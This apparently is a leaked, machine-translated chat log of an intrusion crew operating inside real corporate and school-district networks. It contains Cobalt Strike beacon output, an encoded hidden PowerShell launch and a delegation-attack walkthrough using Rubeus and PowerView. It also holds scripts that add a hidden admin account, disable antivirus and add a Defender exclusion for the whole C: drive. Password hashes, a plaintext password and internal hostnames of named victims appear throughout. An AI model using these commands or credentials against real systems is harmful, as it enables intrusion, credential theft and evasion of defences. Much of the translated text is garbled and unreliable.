svchost.exe 1152 Services 0 8,808 K Unknown N/A 0:00:02 N/A
svchost.exe 1144 Services 0 9,424 K Unknown N/A 0:00:01 N/A
svchost.exe 1180 Services 0 10,608 K Unknown N/A 0:00:04 N/A
svchost.exe 1444 Services 0 11,976 K Unknown N/A 0:00:01 N/A
svchost.exe 1948 Services 0 9,440 K Unknown N/A 0:00:14 N/A
svchost.exe 2008 Services 0 15,284 K Unknown N/A 0:00:02 N/A
svchost.exe 2060 Services 0 10,680 K Unknown N/A 0:00:22 N/A
svchost.exe 2196 Services 0 29,084 K Unknown N/A 0:07:19 N/A
svchost.exe 2292 Services 0 15,996 K Unknown N/A 0:00:02 N/A
svchost.exe 2300 Services 0 10,900 K Unknown N/A 0:00:04 N/A
svchost.exe 2308 Services 0 53,020 K Unknown N/A 0:01:47 N/A
svchost.exe 2324 Services 0 11,272 K Unknown N/A 0:00:23 N/A
svchost.exe 2332 Services 0 116,176 K Unknown N/A 0:41:49 N/A
svchost.exe 2340 Services 0 7,492 K Unknown N/A 0:00:02 N/A
Memory Compression 2460 Services 0 6,720 K Unknown N/A 0:00:41 N/A
svchost.exe 2532 Services 0 10,220 K Unknown N/A 0:00:01 N/A
svchost.exe 2588 Services 0 9,528 K Unknown N/A 0:00:01 N/A
svchost.exe 2596 Services 0 9,700 K Unknown N/A 0:00:01 N/A
svchost.exe 2604 Services 0 18,032 K Unknown N/A 0:00:18 N/A
svchost.exe 2856 Services 0 15,416 K Unknown N/A 0:00:04 N/A
svchost.exe 2932 Services 0 12,280 K Unknown N/A 0:00:03 N/A
svchost.exe 3016 Services 0 7,888 K Unknown N/A 0:00:04 N/A
svchost.exe 3028 Services 0 11,456 K Unknown N/A 0:00:04 N/A
svchost.exe 2172 Services 0 9,596 K Unknown N/A 0:00:04 N/A
svchost.exe 2272 Services 0 9,660 K Unknown N/A 0:00:01 N/A
svchost.exe 2564 Services 0 9,272 K Unknown N/A 0:00:10 N/A
svchost.exe 2688 Services 0 10,828 K Unknown N/A 0:00:48 N/A
svchost.exe 2764 Services 0 14,144 K Unknown N/A 0:00:01 N/A
svchost.exe 3132 Services 0 55,284 K Unknown N/A 0:23:09 N/A
svchost.exe 3236 Services 0 19,864 K Unknown N/A 0:00:01 N/A
svchost.exe 3256 Services 0 15,324 K Unknown N/A 0:00:05 N/A
svchost.exe 3268 Services 0 11,504 K Unknown N/A 0:00:38 N/A
spoolsv.exe 3348 Services 0 31,140 K Unknown N/A 0:00:17 N/A
svchost.exe 3524 Services 0 13,912 K Unknown N/A 0:00:02 N/A
svchost.exe 3552 Services 0 9,112 K Unknown N/A 0:00:02 N/A
BrokerAgent.exe 3680 Services 0 115,084 K Unknown N/A 0:00:47 N/A
CdfSvc.exe 3688 Services 0 9,020 K Unknown N/A 0:00:01 N/A
encsvc.exe 3708 Services 0 8,136 K Unknown N/A 0:15:44 N/A
CseEngine.exe 3768 Services 0 31,752 K Unknown N/A 0:00:47 N/A
PicaSvc2.exe 3816 Services 0 59,540 K Unknown N/A 0:00:11 N/A
UWACacheService.exe 3828 Services 0 48,584 K Unknown N/A 0:00:08 N/A
CtxCeipSvc.exe 3844 Services 0 9,424 K Unknown N/A 0:00:29 N/A
CmRcService.exe 3868 Services 0 14,192 K Unknown N/A 0:00:00 N/A
svchost.exe 3888 Services 0 7,848 K Unknown N/A 0:00:01 N/A
svchost.exe 3960 Services 0 16,604 K Unknown N/A 0:00:33 N/A
CtxAudioService.exe 3980 Services 0 13,680 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 4012 Services 0 10,360 K Unknown N/A 0:00:00 N/A
WebSocketService.exe 4052 Services 0 11,284 K Unknown N/A 0:00:00 N/A
CtxSvcHost.exe 4092 Services 0 9,500 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 3228 Services 0 9,556 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 3444 Services 0 126,708 K Unknown N/A 0:00:03 N/A
svchost.exe 3608 Services 0 46,272 K Unknown N/A 0:01:00 N/A
svchost.exe 4116 Services 0 46,932 K Unknown N/A 0:02:39 N/A
CtxSvcHost.exe 4264 Services 0 9,540 K Unknown N/A 0:00:02 N/A
svchost.exe 4288 Services 0 7,236 K Unknown N/A 0:00:01 N/A
VGAuthService.exe 4304 Services 0 12,024 K Unknown N/A 0:00:04 N/A
vmtoolsd.exe 4312 Services 0 24,408 K Unknown N/A 0:04:45 N/A
MsMpEng.exe 4340 Services 0 235,604 K Unknown N/A 0:35:37 N/A
svchost.exe 4348 Services 0 22,264 K Unknown N/A 0:00:02 N/A
CtxSvcHost.exe 4632 Services 0 9,520 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 4640 Services 0 9,704 K Unknown N/A 0:00:01 N/A
svchost.exe 4744 Services 0 11,780 K Unknown N/A 0:00:38 N/A
svchost.exe 4760 Services 0 9,248 K Unknown N/A 0:00:02 N/A
svchost.exe 4784 Services 0 7,152 K Unknown N/A 0:00:02 N/A
svchost.exe 4820 Services 0 10,500 K Unknown N/A 0:00:02 N/A
dllhost.exe 5292 Services 0 16,212 K Unknown N/A 0:00:13 N/A
svchost.exe 5416 Services 0 11,572 K Unknown N/A 0:00:01 N/A
WmiPrvSE.exe 5440 Services 0 39,052 K Unknown N/A 0:41:08 N/A
WmiPrvSE.exe 5692 Services 0 52,708 K Unknown N/A 0:09:35 N/A
msdtc.exe 5780 Services 0 13,344 K Unknown N/A 0:00:02 N/A
svchost.exe 6364 Services 0 22,544 K Unknown N/A 0:05:27 N/A
svchost.exe 6668 Services 0 9,036 K Unknown N/A 0:00:01 N/A
CtxSvcHost.exe 6992 Services 0 8,308 K Unknown N/A 0:00:02 N/A
SemsService.exe 7000 Services 0 35,776 K Unknown N/A 0:00:06 N/A
ctxrdr.exe 7012 Services 0 8,684 K Unknown N/A 0:00:02 N/A
CpSvc64.exe 7024 Services 0 15,924 K Unknown N/A 0:00:04 N/A
svchost.exe 7192 Services 0 9,216 K Unknown N/A 0:00:38 N/A
svchost.exe 7268 Services 0 6,908 K Unknown N/A 0:00:01 N/A
SearchIndexer.exe 7488 Services 0 50,656 K Unknown N/A 1:03:01 N/A
WmiPrvSE.exe 8056 Services 0 14,196 K Unknown N/A 0:01:05 N/A
svchost.exe 4672 Services 0 11,364 K Unknown N/A 0:00:02 N/A
svchost.exe 2956 Services 0 28,712 K Unknown N/A 0:02:14 N/A
svchost.exe 7548 Services 0 13,604 K Unknown N/A 0:03:46 N/A
CcmExec.exe 3336 Services 0 69,960 K Unknown N/A 0:01:50 N/A
svchost.exe 2520 Services 0 18,964 K Unknown N/A 0:00:01 N/A
WmiPrvSE.exe 2220 Services 0 18,432 K Unknown N/A 0:00:11 N/A
TelemetryService.exe 7560 Services 0 81,596 K Unknown N/A 0:00:21 N/A
AotListener.exe 2072 Services 0 36,720 K Unknown N/A 0:00:01 N/A
conhost.exe 4136 Services 0 12,768 K Unknown N/A 0:00:00 N/A
SgrmBroker.exe 5404 Services 0 6,160 K Unknown N/A 0:00:05 N/A
WmiPrvSE.exe 6688 Services 0 10,540 K Unknown N/A 0:00:00 N/A
WmiPrvSE.exe 8532 Services 0 53,972 K Unknown N/A 0:00:06 N/A
svchost.exe 8916 Services 0 17,940 K Unknown N/A 0:00:03 N/A
svchost.exe 8972 Services 0 10,060 K Unknown N/A 0:00:03 N/A
svchost.exe 3384 Services 0 33,832 K Unknown N/A 0:00:13 N/A
svchost.exe 6032 Services 0 21,468 K Unknown N/A 0:00:02 N/A
SecurityHealthService.exe 2896 Services 0 18,372 K Unknown N/A 0:00:03 N/A
svchost.exe 2088 Services 0 11,516 K Unknown N/A 0:00:02 N/A
NisSrv.exe 8760 Services 0 10,852 K Unknown N/A 0:00:04 N/A
svchost.exe 3084 Services 0 17,980 K Unknown N/A 0:00:04 N/A
svchost.exe 5652 Services 0 9,660 K Unknown N/A 0:00:00 N/A
svchost.exe 9604 Services 0 10,792 K Unknown N/A 0:00:01 N/A
svchost.exe 14016 Services 0 12,708 K Unknown N/A 0:00:00 N/A
csrss.exe 6224 Console 3 5,244 K Running N/A 0:00:05 N/A
winlogon.exe 6912 Console 3 13,436 K Unknown N/A 0:00:00 N/A
PicaSessionAgent.exe 10960 Console 3 11,608 K Running N/A 0:00:00 PicaSessionAgent
dwm.exe 10160 Console 3 90,200 K Running N/A 0:00:25 DWM Notification Window
fontdrvhost.exe 13920 Console 3 8,156 K Unknown N/A 0:00:00 N/A
PicaEuemRelay.exe 13704 Console 3 11,208 K Running N/A 0:00:00 PicaEuemRelay
GfxMgr.exe 13264 Console 3 11,368 K Running N/A 0:00:00 GfxMgrNotificationWindow
PicaTwiHost.exe 6252 Console 3 10,016 K Unknown N/A 0:00:00 N/A
CtxGfx.exe 13904 Console 3 56,964 K Running N/A 0:00:06 CtxGfxNotificationWindow
rundll32.exe 12096 Console 3 11,260 K Running N/A 0:00:00 N/A
ssonsvr.exe 1368 Console 3 10,916 K Running N/A 0:00:00 N/A
PicaUserAgent.exe 12500 Console 3 9,496 K Running OASISPETR\bmolinaro 0:00:00 PicaUserAgent
sihost.exe 3616 Console 3 27,124 K Running OASISPETR\bmolinaro 0:00:05 N/A
svchost.exe 13008 Console 3 20,796 K Unknown OASISPETR\bmolinaro 0:00:01 N/A
svchost.exe 7364 Console 3 32,160 K Running OASISPETR\bmolinaro 0:00:00 Windows Push Notifications Platform
taskhostw.exe 8800 Console 3 17,768 K Running OASISPETR\bmolinaro 0:00:00 Task Host Window
explorer.exe 812 Console 3 163,952 K Running OASISPETR\bmolinaro 0:01:06 N/A
svchost.exe 12316 Console 3 23,920 K Running OASISPETR\bmolinaro 0:00:00 N/A
WmiPrvSE.exe 11848 Services 0 16,516 K Unknown N/A 0:00:00 N/A
PicaShell.exe 11696 Console 3 26,748 K Running OASISPETR\bmolinaro 0:00:01 N/A
CtxMtHost.exe 13152 Console 3 11,928 K Running OASISPETR\bmolinaro 0:00:00 CtxTouchWTSWindow
mmvdhost.exe 13348 Console 3 13,996 K Running OASISPETR\bmolinaro 0:00:00 ICA Seamless Host Agent
StartMenuExperienceHost.e 9280 Console 3 66,000 K Running OASISPETR\bmolinaro 0:00:02 Start
WindowsInternal.Composabl 2472 Console 3 40,088 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Text Input Application
RuntimeBroker.exe 12640 Console 3 26,744 K Unknown OASISPETR\bmolinaro 0:00:03 N/A
SearchUI.exe 2756 Console 3 196,552 K Running OASISPETR\bmolinaro 0:00:14 N/A
RuntimeBroker.exe 13468 Console 3 38,308 K Running OASISPETR\bmolinaro 0:00:02 N/A
YourPhone.exe 11552 Console 3 272 K Running OASISPETR\bmolinaro 0:00:00 N/A
ctfmon.exe 14180 Console 3 16,504 K Running OASISPETR\bmolinaro 0:00:03 N/A
RuntimeBroker.exe 1956 Console 3 13,824 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
svchost.exe 10856 Console 3 21,984 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
SCNotification.exe 9780 Console 3 39,064 K Running OASISPETR\bmolinaro 0:00:00 .NET-BroadcastEventWindow.4.0.0.0.1ca0192.0
SecurityHealthSystray.exe 11524 Console 3 13,416 K Running OASISPETR\bmolinaro 0:00:00 N/A
vmtoolsd.exe 11924 Console 3 18,028 K Running OASISPETR\bmolinaro 0:00:00 N/A
OneDrive.exe 11900 Console 3 69,616 K Running OASISPETR\bmolinaro 0:00:01 N/A
concentr.exe 6420 Console 3 22,880 K Running OASISPETR\bmolinaro 0:00:00 N/A Citrix Connection Center
Receiver.exe 11284 Console 3 23,464 K Running OASISPETR\bmolinaro 0:00:06 Citrix Receiver Notification
SelfServicePlugin.exe 8156 Console 3 29,836 K Running OASISPETR\bmolinaro 0:00:00 G
wfcrun32.exe 13200 Console 3 18,692 K Running OASISPETR\bmolinaro 0:00:00 RedirectWindow_Wind:3390:WFCRUN32.EXE
ApplicationFrameHost.exe 6900 Console 3 29,588 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Store
WinStore.App.exe 6884 Console 3 52 K Running OASISPETR\bmolinaro 0:00:00 Microsoft Store
RuntimeBroker.exe 11240 Console 3 9,936 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
dllhost.exe 6124 Console 3 12,432 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
RuntimeBroker.exe 12752 Console 3 18,520 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
powershell.exe 12576 Console 3 88,356 K Running OASISPETR\bmolinaro 0:00:01 Windows PowerShell
conhost.exe 896 Console 3 21,876 K Running OASISPETR\bmolinaro 0:00:01 N/A
WmiPrvSE.exe 13540 Services 0 39,316 K Unknown N/A 0:00:01 N/A
cmd.exe 12088 Console 3 7,736 K Running OASISPETR\bmolinaro 0:00:00 Command Prompt - powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIA
conhost.exe 504 Console 3 22,900 K Running OASISPETR\bmolinaro 0:00:02 N/A
mstsc.exe 736 Console 3 30,544 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
ShellExperienceHost.exe 12760 Console 3 49,140 K Running OASISPETR\bmolinaro 0:00:00 Jump List for File Explorer
RuntimeBroker.exe 8688 Console 3 20,776 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
mstsc.exe 6064 Console 3 27,724 K Running OASISPETR\bmolinaro 0:00:01 Remote Desktop Connection
taskhostw.exe 13376 Services 0 17,012 K Unknown N/A 0:00:00 N/A
svchost.exe 12452 Services 0 82,648 K Unknown N/A 0:03:08 N/A
sppsvc.exe 7804 Services 0 11,756 K Unknown N/A 0:00:11 N/A
svchost.exe 10372 Services 0 22,744 K Unknown N/A 0:02:01 N/A
svchost.exe 11076 Services 0 7,560 K Unknown N/A 0:00:00 N/A
mstsc.exe 12112 Console 3 27,836 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
mstsc.exe 6340 Console 3 27,528 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection
powershell.exe 8820 Console 3 78,588 K Running OASISPETR\bmolinaro 0:00:01 OleMainThreadWndName
MpCmdRun.exe 11944 Services 0 13,808 K Unknown N/A 0:00:00 N/A
svchost.exe 8492 Services 0 11,052 K Unknown N/A 0:00:00 N/A
smartscreen.exe 3808 Console 3 24,536 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName
cmd.exe 6768 Console 3 7,460 K Running OASISPETR\bmolinaro 0:00:00 Command Prompt
conhost.exe 5504 Console 3 22,348 K Running OASISPETR\bmolinaro 0:00:00 N/A
tasklist.exe 6508 Console 3 11,592 K Unknown OASISPETR\bmolinaro 0:00:00 N/A
``````
At line:1 char:1

+ <#

+ ~~
This script contains malicious content and has been blocked by your antivirus software.
``I think it's blocking the conect@tl1 lwm bilder dlloc try, it fudne understand that ?versionlvm try it will be worse if you try with the old cryptor ?removeagajdin what ? waiting now redenier32 is 64 bit dll ? give the dll to work ?i can see it, put this command to cmd have access all the same ?rdp, vntz and so on start somerp, powershell, cmd, execute and so on what do you mean ?believe what analogues run ? any suggestions how to raise the session ?rdp also can not two whining(by hell) from the list have this port ?
CORPKIOINTSQLP.CORP.TELEVISA.COM.MX
10.7.6.186:2717
``from a scan point may be closed, in one MSSQLSvc/CORPKIOBDD101.corp.televisa.com.mx:2717
in the others no + this port is closed port in spn? from hell
```
CORPKIOSQLVS02.CORP.TELEVISA.COM.MX
CORPKIOINTSQLP.CORP.TELEVISA.COM.MX
CORPKIOCRMSQLD.CORP.TELEVISA.COM.MX
CORPSFEDSQLD.CORP.TELEVISA.COM.MX
CORPSFEDSQLP.CORP.TELEVISA.COM.MX
ADMIN_SQL@FILIAL.TELEVISA.COM.MX
CORPKIOSHPSQLP.CORP.TELEVISA.COM.MX
CORPKIONCSQL02.CORP.TELEVISA.COM.MX
CORPKIONCSQL01.CORP.TELEVISA.COM.MX
CORPKIONCSQL03.CORP.TELEVISA.COM.MX
``Is there any way we can still find out what port the skull is running on if ladon and msf don't give out anything on the skull?
they have custom ports on the skull
on one server it's on port 50101 and the other servers are closed `CORP\ctxdbadmin 7106c947d3a8abbea16cb5448f4ac00a` they have `Administrator` on some machines and `Administrador` on others, most likely yes
in the main domain almost everything is in English)may be they have international dialectic only need to learn) kek100% YES is to go to work in this company admin))it all gives a chancedano check skulia even in one half may be one LA, the second other LA yes, it is worth a try
but the chances are, of course, 50\50 because little overlap LA, conventionally in one group of servers one LA and eventually expand the network will find the other pool of servers with this group LA can be hashdump polzak from this group can have local admins from the group that you have not seen before)``
CORPKIOBDD101\sqladmin:::2d593a1a330c2649716df558a5912ceb:::
``no, but does that do us any good?
there are a couple of whines where there is access, but the admins are sitting right on a limited number of cars, including dk and whines among them no you skul servaks brute force? or check the anonymous entrance? but from the classics ``you abuzilal genericall right?
didn't you abusive genericall rights?
```
Full control of a computer object can be used to perform a resource based constrained delegation attack.

Abusing this primitive is currently only possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB68393941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
```
there is a user who has these permissions on the dk, or rather even a whole group, only I don't really understand how it works.
We add a machine account, sort of replace the original? That is, we reset the password from the machine account, and since it is dk, the network will fall.

Pinging filialeadc01.filial.televisa.com.mx [10.30.17.24] with 32 bytes of data:
Reply from 10.30.17.24: bytes=32 time=67ms TTL=122

Ping statistics for 10.30.17.24:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 67ms, Maximum = 67ms, Average = 67ms

beacon> portscan 10.30.17.24 445 none
[*] Tasked beacon to scan ports 445 on 10.30.17.24
[+] host called home, sent: 93285 bytes
[+] received output:
10.30.17.24:445
``+CORPKLHLQRD01 - pass``demosave.com``FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b` valid`FILIAL\jcgarciae TVSAcrm8888!Valid with user1poka all are busy, reserve for us) appeared fresh in the work grid, if anyone idle - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent, on you chetu on then
i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere ?on regbest.com should be coming soon session from chetu.com - tell me how it will arrive in .binverno-10 minutes
now will be ready paiload - i will make all hello, we need dllk segonday for bouncing, right?
```
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)

[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)

[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)

[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)

[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)

[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)

[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)

[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
The kerb would be very helpful ... looking for a grid really big, oushek trash.on this, apparently, and no addinskih kreds.``
@ECHO OFF
net user LEADMIN Deere0419! /add
net localgroup Administrators LEADMIN /add
WMIC USERACCOUNT WHERE Name='LEADMIN' SET PasswordExpires=FALSE
``He found a script, I think with his help, they administered polzakowest little admin, apparently a local net division I checked - active or the account off or a real blank password if it does not contradict the policies of the addpost because it can not access the real hashdump question: how can it happen that hashdump shows a blank password for the dude who has the account is active?the neighbors have come back hogeys no voodoo it's not generalsessions and stuff clean up files as you can optionally set ignores and scans off of course there's no offsets there Using command linehttps://www.bitdefender.co.th/wp-content/uploads/gz/Bitdefender_EndpointSecurityToolsForWindows_UsersGuide_enUS.pdfhttps://www.wilderssecurity.com/threads/bitdefender-free-edition-service-start-stop-script.245247/
```
net start XCOMM
sc config XCOMM start= auto

net start bdss
sc config bdss start= auto

net start VSSERV
sc config VSSERV start= auto

net start LIVESRV
sc config LIVESRV start= auto

"C:\Program Files\Softwin\BitDefender10\bdmcon.exe"

net stop LIVESRV
sc config LIVESRV start= demand

net stop VSSERV
sc config VSSERV start= demand

net stop bdss
sc config bdss start= demand

net stop XCOMM
sc config XCOMM start= demand

``Send it to the forum and let it sit there.
https://codeby.net/threads/antivirusy-v-nokaut.60706/моих no there are no files in the system32 no old ones, surely they are not in the system32 not mine, and I have not left anywhere else) and also? allzona in the folder zabix, and the rest in the system32 dns where were they?) yes old files removed? already clean up the codeyda files all? thanks excellent + I am talking about files do not forget to clean up after themselves you by the way at this rate in the system will shit all over the wild no it is ok ` `?
User7[GEORDI]Administrator */4692|2020Dec07 19:46:30> shell wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt"
[*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt"
[+] host called home, sent: 175 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 7116;
	ReturnValue = 0;
};
```
but there's a problem with the second command, it doesn't output the dnsyd file) `` ``
User7[GEORDI]Administrator */4692|2020Dec07 19:38:31> shell wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt"
[*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt"
[+] host called home, sent: 129 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 2576;
	ReturnValue = 0;
};


``Tool is in place, so everything is ok maybe remove the blank spaces from the > sign, if there is then it is the wrong way to run it check in system32 the utility file is not in the directory in short it did not work`sisd.k12\ExchAdmin f461d17330cadafe07025e2252256eda52a` under these creeds did not even copy it there for some reason... I don't see what the problem is with this)‖dll starts,‖ which means you somehow execute commands and you have mapping there.‖ Nowdll starts but no session arrives. User7 will come to him for details I think you have a way to start or not knocking?[ ](https://mediaeveryone.com/group/sisd-net?msg=zxeqyR78o3vFDDKu) do not come up i.e. there is no way to control? and stask? wmi disabled I'm waiting for the day I think you know the answer you need a session to work on a remote host? how kids already want to scoldbozhej jump on them did not work, I now try through sharpsbeck dns where?no, everything is correct - not rising and the sessions now let's try again, i screwed up like that just tell me what's with dhc01 with dhcp role it can be in this network dhcp servers are called dhcp1 and dhcp2 now to the question of sessions on dhcp I did not read the messages above nudhcp and dhcp for the guys the same thing?dhcp1 and dhcp2) now the session is dhcp1 and dhcp2. dhcp does not work with dhcp I do not know how it works with you at all forget about the jump on them dll not copy, jump also does not work they just dhcp called dhcp, dnsa why dhcp you? 3 servers can not jump to dhcp static
Windows IP Configuration

   Host Name . . . . . .: SchoolBooks
   Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪
   Node Type . . . . .: Hybrid
   IP Routing Enabled. . . . : No
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .: admin.sisd.k12
                                       sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . .: Microsoft Hyper-V Network Adapter.
   Physical Address . . . . .: 00-15-5D-01-DF-19
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::740f:5d54:8746:1b6d%6(Preferred)
   IPv4 Address . . . . .: 10.0.51.46(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Default Gateway . . . . : 10.0.1.254
   DHCPv6 IAID . . . . : 100668765
   DHCPv6 Client DUID . . . . : 00-01-00-01-26-88-57-CF-00-15-5D-01-DF-19
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip. . . . .: Enabled

``````
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.0.51.46
                                 [02]: fe80::740f:5d54:8746:1b6d

``I also check that we have statics on all servers partially dhcp on armas?
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.0.51.3
                                 [02]: fe80::3c15:2b64:760d:eb2b

``And dnscmd is only on dns servers? Do not shoot all in a row check a few armies and servers and tell me exactly where it is, let's do it without maybe on the servers maybe static?
Windows IP Configuration

   Host Name . . . . . . ♪ Geordi ♪
   Primary Dns Suffix . . . : sisd.k12
   Node Type . . . . .: Hybrid
   IP Routing Enabled . . . . No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. : sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . .: Microsoft Hyper-V Network Adapter.
   Physical Address . . . . : 00-15-5D-01-80-12
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::3c15:2b64:760d:eb2b%4(Preferred)
   IPv4 Address . . . . .: 10.0.51.3(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Default Gateway . . . . : 10.0.1.254
   DHCPv6 IAID . . . . . : 50337117
   DHCPv6 Client DUID . . . . : 00-01-00-01-23-90-84-20-00-15-5D-01-80-12
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip . . . ♪ Enabled ♪

Tunnel adapter Local Area Connection* 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes

````for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt `
at first
` dnscmd /enumzones > AllZones.txt ` how to remove dns I'll tell you a few arms just in case and from the second? yes that's from this domain as I understand `
Connection-specific DNS Suffix . : admin.sisd.k12
``[ ](https://mediaeveryone.com/group/sisd-net?msg=x2ctb3ESgCPjiNgNn) from Armagh.
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
``[ ](https://mediaeveryone.com/group/sisd-net?msg=96HNaj7DMbYkmC8Mt) what's that from?
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . : SRM-312-020.
   Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪
   Node Type . . . . Hybrid
   IP Routing Enabled . . . . : No
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .: admin.sisd.k12
                                       sisd.k12
                                       sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . . : admin.sisd.k12
   Description . . . . . ♪ Realtek PCIe GBE Family Controller ♪
   Physical Address . . . . : B8-85-84-AA-FB-02
   DHCP Enabled. . . . . .: Yes
   Autoconfiguration Enabled. .: Yes
   IPv4 Address. : 10.57.243.225(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Lease Obtained . . . . ♪ Wednesday, September 16, 2020 5:30:41 PM ♪
   Lease Expires . . . . .: Tuesday, December 8, 2020 5:31:27 PM
   Default Gateway . . . . : 10.57.1.254
   DHCP Server . . . . : 10.0.51.4
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip . . . ♪ Enabled ♪

``+ remove dns in general find infuna unlikely staticsu armaments dhcp or statics? so here they are also pinged probably) citricos armaments? I mean, they change from time to time citricos dhcpdns not see statics or dhcp in armaments? already all pinged```
 take off the dhcp
see the armies on dhcp or static
and ping them
``There's a problem for 1 man-session in two domains in the slip so far, throw in a good jobWin Def
```
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
